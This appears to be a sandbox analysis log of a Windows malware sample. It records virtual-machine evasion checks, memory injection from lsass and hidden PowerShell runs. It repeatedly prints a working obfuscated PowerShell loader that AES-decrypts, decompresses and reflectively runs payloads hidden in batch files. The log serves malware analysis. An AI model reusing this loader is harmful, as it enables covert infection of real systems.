Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:amvxseuhmbvc{param([outputtype([type])][parameter(position=0)][type[]]$uiloijomlvxjkf,[parameter(position=1)][type]$qydjyvedmn)$nmmwpnxadvf=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+[char](68)+''+[char](101)+''+[char](108)+'e'+[char](103)+''+[char](97)+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+''+[char](101)+'m'+[char](111)+''+[char](114)+''+'y'+''+[char](77)+''+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype('m'+[char](121)+'d'+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+'y'+[char](112)+'e',''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+'l'+'i'+[char](99)+','+[char](83)+''+[char](101)+'a'+'l'+''+[char](101)+'d'+[char](44)+'an'+[char](115)+'icla'+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+'as'+[char](115)+'',[multicastdelegate]);$nmmwpnxadvf.defineconstructor('r'+[char](84)+'s'+'p'+''+'e'+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+''+[char](78)+''+'a'+''+'m'+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+[char](101)+''+[char](66)+''+[char](121)+'si'+'g'+','+[char](80)+''+[char](117)+'b'+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$uiloijomlvxjkf).setimplementationflags('ru'+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+','+'m'+''+[char](97)+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$nmmwpnxadvf.definemethod(''+'i'+''+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+'c'+''+[char](44)+'h'+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+'slo'+'t'+','+[char](86)+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qydjyvedmn,$uiloijomlvxjkf).setimplementationflags(''+'r'+'u'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $nmmwpnxadvf.createtype();}$swnyxvukgpflw=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+'e'+''+[char](109)+''+'.'+'d'+'l'+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+'c'+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+'t.'+[char](87)+'i'+'n'+''+'3'+''+[char](50)+'.'+'u'+'n'+[char](115)+''+[char](97)+''+'f'+''+'e'+''+[char](78)+''+'a'+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+'o'+[char](100)+'s');$amujszcronxavl=$swny
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
Source: dwm.exe, 0000002A.00000002.3081128578.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000000.2467392240.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
